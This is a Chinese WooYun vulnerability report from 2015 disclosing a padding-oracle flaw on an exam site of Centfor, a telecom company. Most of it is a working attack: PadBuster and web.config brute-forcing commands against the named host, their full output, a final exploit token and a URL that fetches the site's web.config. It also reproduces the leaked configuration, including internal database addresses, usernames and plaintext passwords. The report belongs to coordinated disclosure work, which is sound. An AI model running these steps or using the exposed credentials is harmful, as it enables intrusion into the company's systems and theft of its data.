当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124663

漏洞标题:向心力通信技术股份有限公司某站padding orcal漏洞#02

相关厂商:centfor.com

漏洞作者: Ton7BrEak

提交时间:2015-07-13 14:05

修复时间:2015-08-28 09:22

公开时间:2015-08-28 09:22

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

向心力通信技术股份有限公司某站padding orcal漏洞

详细说明:

1、检测http://kaoshi.centfor.com/WebResource.axd?d=1436061238 疑似存在padding orcal漏洞

001.jpg


2、直接上脚本跑一跑

padBuster.pl http://kaoshi.centfor.com/WebResource
.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 9MBwmxN6TLKjC8S3CdFGyw2 16 -encoding 3 -plaintext
"|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 500
[+] Location: N/A
[+] Content Length: 4843
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3721 N/A
2 ** 255 500 4843 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (100) [Byte 16]
[+] Success: (89) [Byte 15]
[+] Success: (199) [Byte 14]
[+] Success: (79) [Byte 13]
ERROR: 500 Can't connect to kaoshi.centfor.com:80
Retrying in 10 seconds...
[+] Success: (31) [Byte 12]
[+] Success: (54) [Byte 11]
[+] Success: (147) [Byte 10]
[+] Success: (131) [Byte 9]
[+] Success: (64) [Byte 8]
[+] Success: (192) [Byte 7]
[+] Success: (24) [Byte 6]
[+] Success: (24) [Byte 5]
[+] Success: (0) [Byte 4]
[+] Success: (157) [Byte 3]
[+] Success: (94) [Byte 2]
[+] Success: (132) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): e82def733b64af2ba5f75f742dad3c64
[+] Intermediate Bytes (HEX): 9451930d1413ca498b94301a4bc45b65
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: 6C3vcztkryul9190La08ZAAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


成功获取了一个值 6C3vcztkryul9190La08ZAAAAAAAAAAAAAAAAAAAAAA1 ,可以进行下一步的操作
3、这个时间比较长,耐心等待即可

Web.config_bruter.pl http://kaoshi.centfor.com/Scr
iptResource.axd 6C3vcztkryul9190La08ZAAAAAAAAAAAAAAAAAAAAAA1 16
<?xml version="1.0"?>
<!--
注意: 除了手动编辑此文件以外,您还可以使用 Web 管理工具来
配置应用程序的设置。
可以使用 Visual Studio 中的“网站”->“Asp.Net 配置”选项。
设置和注释的完整列表在 machine.config.comments 中,
该文件通常位于
\Windows\Microsoft.Net\Framework\v2.x\Config 中
-->
<configuration>
<configSections>
<sectionGroup name="system.web.extensions" type="System.Web.Configuration.SystemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
<sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
<section name="scriptResourceHandler" type="System.Web.Configuration.ScriptingScriptResourceHandlerSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/>
<sectionGroup name="webServices" type="System.Web.Configuration.ScriptingWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
<section name="jsonSerialization" type="System.Web.Configuration.ScriptingJsonSerializationSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="Everywhere"/>
<section name="profileService" type="System.Web.Configuration.ScriptingProfileServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/>
<section name="authenticationService" type="System.Web.Configuration.ScriptingAuthenticationServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/>
<section name="roleService" type="System.Web.Configuration.ScriptingRoleServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication"/>
</sectionGroup>
</sectionGroup>
</sectionGroup>
</configSections>
<appSettings/>
<connectionStrings>
<add name="ExamConnString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=Centfor_Exam;User ID=centfor_Exam;pwd=centfor_Exam_11@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"
/>
<!--前台登陆用 -->
<add name="LoginString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=oa_human;User ID=oa_human_reader;pwd=oa_human_reader@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"/>

<!--前台用户登陆SQL语句! UserInfo用户表;UserID:正式工号;TemporaryUserID:临时工号;UserPwd:密码;[Status] 状态(0:临时、1:正式、2:离职) -->
<add name="LoginSQL" connectionString="select WorkNO,TempWorkNO,[PassWord],[UserWorkState] from [User] where ([PassWord]=@userPwd and WorkNO=@userID and [UserWorkState]=1) or ( TempWorkNO=@userID and [PassWord]=@userPwd and [UserWorkState]=0)" />
<add name="Centfor_ExamConnectionString1" connectionString="Data Source=sea;Initial Catalog=Centfor_Exam;Persist Security Info=True;User ID=sa;MultipleActiveResultSets=False;Packet Size=4096;Application Name=&quot;Microsoft SQL Server Management Studio&quot;" providerName="System.Data.SqlClient"/>
</connectionStrings>
<system.web>
<sessionState mode="InProc" timeout="150" />
<customErrors mode="Off"/>
<!--
设置 compilation debug="true" 可将调试符号
插入已编译的页面中。
但由于这会影响性能,因此只在开发过程中将此值
设置为 true。
-->
<compilation debug="true">
<assemblies>
<add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
<add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
<add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
</assemblies>
</compilation>
<!--
通过 <authentication> 节可以配置 ASP.NET 用来
识别进入用户的
安全身份验证模式。
-->
<authentication mode="Windows"/>
<!--
如果在执行请求的过程中出现未处理的错误,
则通过 <customErrors> 节可以配置相应的处理步骤。
具体说来,
开发人员通过该节可以配置
要显示的 HTML 错误页以代替错误堆栈跟踪。
<customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
<error statusCode="403" redirect="NoAccess.htm" />
<error statusCode="404" redirect="FileNotFound.htm" />
</customErrors>
-->
<pages>
<controls>
<add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</controls>
</pages>
<httpHandlers>
<remove verb="*" path="*.asmx"/>
<add verb="*" path="*.asmx" validate="false" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add verb="*" path="*_AppService.axd" validate="false" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add verb="GET,HEAD" path="ScriptResource.axd" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" validate="false"/>
</httpHandlers>
<httpModules>
<add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</httpModules>
</system.web>
<system.codedom>
<compilers>
<compiler language="c#;cs;csharp" extension=".cs" warningLevel="4" type="Microsoft.CSharp.CSharpCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<providerOption name="CompilerVersion" value="v3.5"/>
<providerOption name="WarnAsError" value="false"/>
</compiler>
<compiler language="vb;vbs;visualbasic;vbscript" extension=".vb" warningLevel="4" type="Microsoft.VisualBasic.VBCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<providerOption name="CompilerVersion" value="v3.5"/>
<providerOption name="OptionInfer" value="true"/>
<providerOption name="WarnAsError" value="false"/>
</compiler>
</compilers>
</system.codedom>
<!--
在 Internet 信息服务 7.0 下运行 ASP.NET AJAX 需要 system.webServer 节。
对早期版本的 IIS 来说则不需要此节。
-->
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<modules>
<remove name="ScriptModule"/>
<add name="ScriptModule" preCondition="managedHandler" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers>
<remove name="WebServiceHandlerFactory-Integrated"/>
<remove name="ScriptHandlerFactory"/>
<remove name="ScriptHandlerFactoryAppServices"/>
<remove name="ScriptResource"/>
<add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.axd" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add name="ScriptResource" preCondition="integratedMode" verb="GET,HEAD" path="ScriptResource.axd" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</handlers>
</system.webServer>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856ad364e35"/>
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31bf3856ad364e35"/>
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>
Total Requests:37787
Resulting Exploit Block:St4cwGLSxLvJvpelabVozOgt73M7ZK8rpfdfdC2tPGQAAAAAAAAAAAAA
AAAAAAAA0


获取最终需要的值St4cwGLSxLvJvpelabVozOgt73M7ZK8rpfdfdC2tPGQAAAAAAAAAAAAA
AAAAAAAA0

漏洞证明:

访问该链接即可直接查看配置
http://kaoshi.centfor.com/ScriptResource.axd?
d=St4cwGLSxLvJvpelabVozOgt73M7ZK8rpfdfdC2tPGQAAAAAAAAAAAAAAAAAAAAA0

001.jpg


数据库信息泄露

<add name="ExamConnString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=Centfor_Exam;User ID=centfor_Exam;pwd=centfor_Exam_11@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"


<add name="LoginString" connectionString="Data Source=10.0.0.21;Failover Partner=10.0.4.49;Initial Catalog=oa_human;User ID=oa_human_reader;pwd=oa_human_reader@centfor;Max Pool Size = 512;" providerName="System.Data.SqlClient"/>

修复方案:

修复漏洞

版权声明:转载请注明来源 Ton7BrEak@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-14 09:21

厂商回复:

感谢白帽子协助我们提高我们系统的安全性。

最新状态:

暂无